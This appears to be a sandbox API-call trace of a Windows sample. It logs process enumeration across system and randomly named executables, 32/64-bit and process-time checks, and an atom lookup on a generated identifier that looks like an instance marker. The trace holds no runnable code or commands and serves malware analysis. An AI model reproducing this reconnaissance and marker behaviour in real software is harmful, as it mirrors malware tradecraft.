	[0126.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.666] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.666] CloseHandle (hObject=0x2dc) returned 1
	[0126.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.666] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.666] CloseHandle (hObject=0x2dc) returned 1
	[0126.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.667] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.667] CloseHandle (hObject=0x2dc) returned 1
	[0126.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.667] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.667] CloseHandle (hObject=0x2dc) returned 1
	[0126.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.668] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.669] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.669] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.669] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.670] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.671] GetLastError () returned 0x5
	[0126.672] GetLastError () returned 0x5
	[0126.672] GetLastError () returned 0x5
	[0126.672] GetLastError () returned 0x5
	[0126.672] GetLastError () returned 0x5
	[0126.672] GetLastError () returned 0x5
	[0126.672] GetLastError () returned 0x5
	[0126.672] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.672] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.672] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.672] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.672] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.672] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.673] CloseHandle (hObject=0x2dc) returned 1
	[0126.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.673] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.673] CloseHandle (hObject=0x2dc) returned 1
	[0126.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.673] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.673] CloseHandle (hObject=0x2dc) returned 1
	[0126.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.674] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.674] CloseHandle (hObject=0x2dc) returned 1
	[0126.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.674] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.674] CloseHandle (hObject=0x2dc) returned 1
	[0126.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.675] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.675] CloseHandle (hObject=0x2dc) returned 1
	[0126.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.711] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.711] CloseHandle (hObject=0x2dc) returned 1
	[0126.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.712] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.712] CloseHandle (hObject=0x2dc) returned 1
	[0126.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.713] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.713] CloseHandle (hObject=0x2dc) returned 1
	[0126.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.713] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.713] CloseHandle (hObject=0x2dc) returned 1
	[0126.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.714] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.714] CloseHandle (hObject=0x2dc) returned 1
	[0126.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.714] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.714] CloseHandle (hObject=0x2dc) returned 1
	[0126.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.714] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.714] CloseHandle (hObject=0x2dc) returned 1
	[0126.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.715] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.715] CloseHandle (hObject=0x2dc) returned 1
	[0126.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.715] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.715] CloseHandle (hObject=0x2dc) returned 1
	[0126.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.716] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.716] CloseHandle (hObject=0x2dc) returned 1
	[0126.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.716] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.716] CloseHandle (hObject=0x2dc) returned 1
	[0126.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.717] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.717] CloseHandle (hObject=0x2dc) returned 1
	[0126.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.717] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.717] CloseHandle (hObject=0x2dc) returned 1
	[0126.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.717] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.718] CloseHandle (hObject=0x2dc) returned 1
	[0126.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.718] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.718] CloseHandle (hObject=0x2dc) returned 1
	[0126.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.718] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.718] CloseHandle (hObject=0x2dc) returned 1
	[0126.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.719] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.719] CloseHandle (hObject=0x2dc) returned 1
	[0126.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.719] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.719] CloseHandle (hObject=0x2dc) returned 1
	[0126.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.720] CloseHandle (hObject=0x2dc) returned 1
